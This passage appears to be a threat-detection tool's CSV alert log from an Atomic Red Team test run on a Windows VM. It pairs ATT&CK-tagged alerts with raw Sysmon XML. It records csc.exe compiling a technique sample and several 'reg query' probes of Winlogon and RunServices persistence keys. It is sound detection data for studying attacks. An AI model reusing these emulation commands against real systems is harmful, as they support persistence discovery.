[ T0000 ] Suspicious process name detected,1563547579.443587,2019-07-19T18:46:19.443587+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe&quot; /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contain suspicious command ( \csc.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:46:19.052666Z"">
</TimeCreated>
<EventRecordID>3617</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:46:19.023</Data>
<Data Name=""ProcessGuid"">747F3D96-D7BB-5D31-0000-0010E7FE2900</Data>
<Data Name=""ProcessId"">2056</Data>
<Data Name=""Image"">C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe</Data>
<Data Name=""FileVersion"">4.7.3190.0 built by: NET472REL1LAST_C</Data>
<Data Name=""Description"">Visual C# Command Line Compiler</Data>
<Data Name=""Product"">Microsoft® .NET Framework</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe&quot; /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547579.052666,2019-07-19T18:46:19.052666+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:56.069498Z"">
</TimeCreated>
<EventRecordID>3616</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:56.040</Data>
<Data Name=""ProcessGuid"">747F3D96-D7A4-5D31-0000-001020C62900</Data>
<Data Name=""ProcessId"">4080</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.743506,2019-07-19T18:49:32.743506+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.728253Z"">
</TimeCreated>
<EventRecordID>3695</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.710</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010CA5B3100</Data>
<Data Name=""ProcessId"">956</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.678107,2019-07-19T18:49:32.678107+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.660402Z"">
</TimeCreated>
<EventRecordID>3693</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.629</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-00103F573100</Data>
<Data Name=""ProcessId"">2440</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.585243,2019-07-19T18:49:32.585243+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.551678Z"">
</TimeCreated>
<EventRecordID>3691</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.541</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010B4523100</Data>
<Data Name=""ProcessId"">4016</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.497481,2019-07-19T18:49:32.497481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.463556Z"">
</TimeCreated>
<EventRecordID>3689</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.447</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010264E3100</Data>
<Data Name=""ProcessId"">1428</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.41339,2019-07-19T18:49:32.413390+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.389557Z"">
</TimeCreated>
<EventRecordID>3687</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.377</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-001097493100</Data>
<Data Name=""ProcessId"">1680</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.335446,2019-07-19T18:49:32.335446+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.304938Z"">
</TimeCreated>
<EventRecordID>3685</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.284</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-001009453100</Data>
<Data Name=""ProcessId"">5016</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.249442,2019-07-19T18:49:32.249442+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.227372Z"">
</TimeCreated>
<EventRecordID>3683</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.212</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-00107A403100</Data>
<Data Name=""ProcessId"">5984</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.180586,2019-07-19T18:49:32.180586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.150327Z"">
</TimeCreated>
<EventRecordID>3681</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.135</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010E83B3100</Data>
<Data Name=""ProcessId"">2888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.150327,2019-07-19T18:49:32.150327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:31.690830Z"">
</TimeCreated>
<EventRecordID>3680</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
